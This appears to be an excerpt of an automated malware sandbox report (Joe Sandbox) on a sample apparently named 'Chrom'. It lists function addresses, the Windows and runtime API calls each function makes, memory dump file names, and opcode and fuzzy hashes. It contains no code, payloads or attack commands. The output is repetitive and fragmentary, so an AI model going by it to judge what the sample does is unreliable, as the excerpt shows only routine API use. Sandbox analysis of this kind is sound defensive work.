                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$memcpy$mallocwcslen
                                                                                                                                                        • String ID: 6n@
                                                                                                                                                        • API String ID: 726966127-1376077705
                                                                                                                                                        • Opcode ID: 9c7b5ed43217881e54566e3aaae3d088c30ddfe0133c3a6c6c6cf896538b121f
                                                                                                                                                        • Instruction ID: 2a297e2a749568a602d4fdd98617bb0f2def5a372598a852c8599cd2a9d3c103
                                                                                                                                                        • Opcode Fuzzy Hash: 9c7b5ed43217881e54566e3aaae3d088c30ddfe0133c3a6c6c6cf896538b121f
                                                                                                                                                        • Instruction Fuzzy Hash: 1E21C372500704EFD730EF18C881C9AB7F9EF453247108A2EF852976A1C735B905CB98
                                                                                                                                                        Function 0040E482 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040E41C: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040E654,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E428
                                                                                                                                                          • Part of subcall function 0040E41C: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040E654,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E436
                                                                                                                                                          • Part of subcall function 0040E41C: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040E654,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E447
                                                                                                                                                          • Part of subcall function 0040E41C: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040E654,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E45E
                                                                                                                                                          • Part of subcall function 0040E41C: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040E654,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E467
                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,004117F5,00000000,?,004122B3,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E49D
                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,004117F5,00000000,?,004122B3,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E4B0
                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,004117F5,00000000,?,004122B3,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E4C3
                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,004117F5,00000000,?,004122B3,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E4D6
                                                                                                                                                        • free.MSVCRT ref: 0040E50F
                                                                                                                                                          • Part of subcall function 0040B02A: free.MSVCRT ref: 0040B031
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ??3@$free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2241099983-0
                                                                                                                                                        • Opcode ID: fa52488197fdfc127ac9ce96ddf417577be6c4487586e28702ed92ce05cb8b53
                                                                                                                                                        • Instruction ID: 42ba5fb2483a06204b9652fd9eb83631712146579ad8a5126b95c8e5bf80326c
                                                                                                                                                        • Opcode Fuzzy Hash: fa52488197fdfc127ac9ce96ddf417577be6c4487586e28702ed92ce05cb8b53
                                                                                                                                                        • Instruction Fuzzy Hash: 0E018E326029305BCA357B2B944142FB394FE95B2431A497FF8157B282DF3CAC5186EE
                                                                                                                                                        Function 004193E6 Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • AreFileApisANSI.KERNEL32 ref: 004193EE
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 0041940E
                                                                                                                                                        • malloc.MSVCRT ref: 00419414
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00419432
                                                                                                                                                        • free.MSVCRT ref: 0041943B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4053608372-0
                                                                                                                                                        • Opcode ID: 2ce22bffb2f624be5e4887deef8eb2f5bb9639764511aad977b4a3fe63ad4965
                                                                                                                                                        • Instruction ID: 2534f474cf9bcd12f65d63d56baaca5d61982f7a50fdf52695ea10ed44cee065
                                                                                                                                                        • Opcode Fuzzy Hash: 2ce22bffb2f624be5e4887deef8eb2f5bb9639764511aad977b4a3fe63ad4965
                                                                                                                                                        • Instruction Fuzzy Hash: A40181B150411CBEAB115BA5DC84CBF7BACEA453EC720427AF414E2190D6344E4196B5
                                                                                                                                                        Function 0040D8EF Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetParent.USER32(?), ref: 0040D901
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0040D90E
                                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 0040D919
                                                                                                                                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D929
                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D945
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4247780290-0
                                                                                                                                                        • Opcode ID: d02ceeb989c3102075357568c0cbbbc984dee6c70047c108da9a167d24dee429
                                                                                                                                                        • Instruction ID: 0a594369ed784f6632fdda1da01060cc62096c5628082a149af8216bf0db4298
                                                                                                                                                        • Opcode Fuzzy Hash: d02ceeb989c3102075357568c0cbbbc984dee6c70047c108da9a167d24dee429
                                                                                                                                                        • Instruction Fuzzy Hash: D3018C3A801029BBDB119BA59C49EFFBFBCEF46710F00402AF901E2090D7789506CBA4
                                                                                                                                                        Function 0044653E Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00409C82: CreateFileW.KERNELBASE(00000003,80000000,00000003,00000000,00000003,00000000,00000000,0040D0E2,0040118B,0040118B,?,?,?,?,000003FF), ref: 00409C94
                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00414948,?,?,?,?,00000104), ref: 00446555
                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 00446569
                                                                                                                                                        • memset.MSVCRT ref: 00446578
                                                                                                                                                          • Part of subcall function 0040A8AE: ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040D11F,?,?,00000000), ref: 0040A8C5
                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0044659B
                                                                                                                                                          • Part of subcall function 0044632F: memchr.MSVCRT ref: 0044636A
                                                                                                                                                          • Part of subcall function 0044632F: memcpy.MSVCRT(?,0044F98C,0000000B,?,?,?,00000000,00000000,00000000), ref: 0044640E
                                                                                                                                                          • Part of subcall function 0044632F: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00446420
                                                                                                                                                          • Part of subcall function 0044632F: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00446448
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004465A2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1471605966-0
                                                                                                                                                        • Opcode ID: b10e60e63540a25e64c8f52e86f8898149edc7e427002224bebf473f2803b541
                                                                                                                                                        • Instruction ID: b0bb4d93dabac42749b0baec13122cd485f3faf15da61d3af90c3903c02b6b6c
                                                                                                                                                        • Opcode Fuzzy Hash: b10e60e63540a25e64c8f52e86f8898149edc7e427002224bebf473f2803b541
                                                                                                                                                        • Instruction Fuzzy Hash: 99F0F6725012107AE6207732AC89E5B7B9CDFD7375F12483FF916911D3EA388804817A
                                                                                                                                                        Function 0040E41C Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040E654,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E428
                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040E654,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E436
                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040E654,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E447
                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040E654,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E45E
                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040E654,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E467
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ??3@
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 613200358-0
                                                                                                                                                        • Opcode ID: 5e31a971ce0e90ae997dd929e40599bb8b987aa99a7b75be807bbe98793c0777
                                                                                                                                                        • Instruction ID: 5bcbd1bb2dbe542c664d49e0b1e478a6f9f39dce4da0d1c56c0f2abaad1a289c
                                                                                                                                                        • Opcode Fuzzy Hash: 5e31a971ce0e90ae997dd929e40599bb8b987aa99a7b75be807bbe98793c0777
                                                                                                                                                        • Instruction Fuzzy Hash: A4F0EC726057019BDB30AF6BA4C041BB7E9AF593147658C3FF049D2641CB38A8504A19
                                                                                                                                                        Function 00406CF9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040B7F7: wcslen.MSVCRT ref: 0040B804
                                                                                                                                                          • Part of subcall function 0040B7F7: free.MSVCRT ref: 0040B827
                                                                                                                                                          • Part of subcall function 0040B7F7: free.MSVCRT ref: 0040B84A
                                                                                                                                                          • Part of subcall function 0040B7F7: memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,6n@,00406D1D,6n@,00000000,?,?,00406E36,00000000), ref: 0040B86E
                                                                                                                                                        • memset.MSVCRT ref: 00406D33
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000FFF,00000000,00000000,00406E36,00000000,-00000002,0040702A,00000000), ref: 00406D4C
                                                                                                                                                          • Part of subcall function 0040B6F7: strlen.MSVCRT ref: 0040B6FE
                                                                                                                                                          • Part of subcall function 0040B6F7: free.MSVCRT ref: 0040B721
                                                                                                                                                          • Part of subcall function 0040B6F7: free.MSVCRT ref: 0040B752
                                                                                                                                                          • Part of subcall function 0040B6F7: memcpy.MSVCRT(00000000,?,00000000,00000000,00406D5E,?), ref: 0040B77F
                                                                                                                                                        • free.MSVCRT ref: 00406D73
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$memcpy$ByteCharMultiWidememsetstrlenwcslen
                                                                                                                                                        • String ID: 6n@
                                                                                                                                                        • API String ID: 832090674-1376077705
                                                                                                                                                        • Opcode ID: 54479ce15e440bb149d53c2abbc7b093be4f2da72d99af89ca78a096c42e0ab3
                                                                                                                                                        • Instruction ID: ecbed58b480fc252fdf2742d1a2ea52a83645ae883cc2f402a8ff7b73a586809
                                                                                                                                                        • Opcode Fuzzy Hash: 54479ce15e440bb149d53c2abbc7b093be4f2da72d99af89ca78a096c42e0ab3
                                                                                                                                                        • Instruction Fuzzy Hash: 0D219371904258BFDB209B59EC40CA937ACEB46329F11807BF855A7393D734DD448BA8
                                                                                                                                                        Function 0040FC16 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 0040FC3A
                                                                                                                                                        • memset.MSVCRT ref: 0040FC51
                                                                                                                                                          • Part of subcall function 0040F0F7: wcscpy.MSVCRT ref: 0040F0FC
                                                                                                                                                          • Part of subcall function 0040F0F7: _wcslwr.MSVCRT ref: 0040F137
                                                                                                                                                        • _snwprintf.MSVCRT ref: 0040FC80
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                        • String ID: </%s>
                                                                                                                                                        • API String ID: 3400436232-259020660
                                                                                                                                                        • Opcode ID: 127f91db7fa9967f18098fe8fb428d38ade9bf4ee3e8a23e6577a73e3d6a66d9
                                                                                                                                                        • Instruction ID: 220adabbb6dc37e078a4cbf870aa6778b0d4aa36b0e6c53f25afcd46a8fb6da8
                                                                                                                                                        • Opcode Fuzzy Hash: 127f91db7fa9967f18098fe8fb428d38ade9bf4ee3e8a23e6577a73e3d6a66d9
                                                                                                                                                        • Instruction Fuzzy Hash: ED018BB3D4021566D720B755CC45FEA776CAF45708F0100B6BB08B7182D7789A558AA9
                                                                                                                                                        Function 0040DA01 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 0040DA3B
                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 0040DA6B
                                                                                                                                                        • EnumChildWindows.USER32(?,Function_0000D9A3,00000000), ref: 0040DA7B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                        • String ID: caption
                                                                                                                                                        • API String ID: 1523050162-4135340389
                                                                                                                                                        • Opcode ID: 4d4bf3293b7fefa2b3ab9066dfd798a39334cfedb85569feeb9d9acd745ef1c9
                                                                                                                                                        • Instruction ID: d45ce5b55de9e56b0e3606efc23fee37021493b8ccd152581ff18ec388878a93
                                                                                                                                                        • Opcode Fuzzy Hash: 4d4bf3293b7fefa2b3ab9066dfd798a39334cfedb85569feeb9d9acd745ef1c9
                                                                                                                                                        • Instruction Fuzzy Hash: C2F0C876E40314AAFB246B95DC4EBCA336C9B05715F1100B2FE04B61D2D7B8EE48CA9C
                                                                                                                                                        Function 0040174F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040A1BC: memset.MSVCRT ref: 0040A1C6
                                                                                                                                                          • Part of subcall function 0040A1BC: wcscpy.MSVCRT ref: 0040A206
                                                                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 0040176E
                                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040178D
                                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 004017AB
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                        • String ID: MS Sans Serif
                                                                                                                                                        • API String ID: 210187428-168460110
                                                                                                                                                        • Opcode ID: 5a950ce4a8f62aae84bef4ee5eac7b078e3a2a1a80d89d7679ccc58871670326
                                                                                                                                                        • Instruction ID: c4faab8ea403b72454229b7d8bee71ac123bd04467b8ab2dfae6cb72e56ca799
                                                                                                                                                        • Opcode Fuzzy Hash: 5a950ce4a8f62aae84bef4ee5eac7b078e3a2a1a80d89d7679ccc58871670326
                                                                                                                                                        • Instruction Fuzzy Hash: 15F08275A5030877E731ABA0DC46F8A77BDB784B01F004939F721BA1D1D7F4A189C698
                                                                                                                                                        Function 0040A33E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ClassName_wcsicmpmemset
                                                                                                                                                        • String ID: edit
                                                                                                                                                        • API String ID: 2747424523-2167791130
                                                                                                                                                        • Opcode ID: 100da318b6eef65e8fb27ecc8cf20afda242377d63b4814d6acd95be43c53634
                                                                                                                                                        • Instruction ID: 615f9df5883ac46bac081f077562738f5b314669235998c993cfb201dc9db725
                                                                                                                                                        • Opcode Fuzzy Hash: 100da318b6eef65e8fb27ecc8cf20afda242377d63b4814d6acd95be43c53634
                                                                                                                                                        • Instruction Fuzzy Hash: 17E0927298030E6AFB10ABA0DC4AFA937ACAB00704F1001B5AA15E10C3E77496494A95
                                                                                                                                                        Function 0041738A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22sleepCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • InterlockedCompareExchange.KERNEL32(0045EB90,00000001,00000000), ref: 00417394
                                                                                                                                                        • InitializeCriticalSection.KERNEL32(0045EAE8), ref: 004173A4
                                                                                                                                                        • Sleep.KERNEL32(00000001), ref: 004173C3
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CompareCriticalExchangeInitializeInterlockedSectionSleep
                                                                                                                                                        • String ID: E
                                                                                                                                                        • API String ID: 4144454223-2089609516
                                                                                                                                                        • Opcode ID: e6fbb2d3d1c0865c93e4ca0e00724d4cc99f07dafa5266e25547b3f1b449e72a
                                                                                                                                                        • Instruction ID: fc88e8258406b36d4da82e75fe45474a615d48495b5640232e67b615d5a4112a
                                                                                                                                                        • Opcode Fuzzy Hash: e6fbb2d3d1c0865c93e4ca0e00724d4cc99f07dafa5266e25547b3f1b449e72a
                                                                                                                                                        • Instruction Fuzzy Hash: 92E04F359492249BEB249B736C087CB3E24AB41703F020037FD19E5553C3A84DC4D6DE
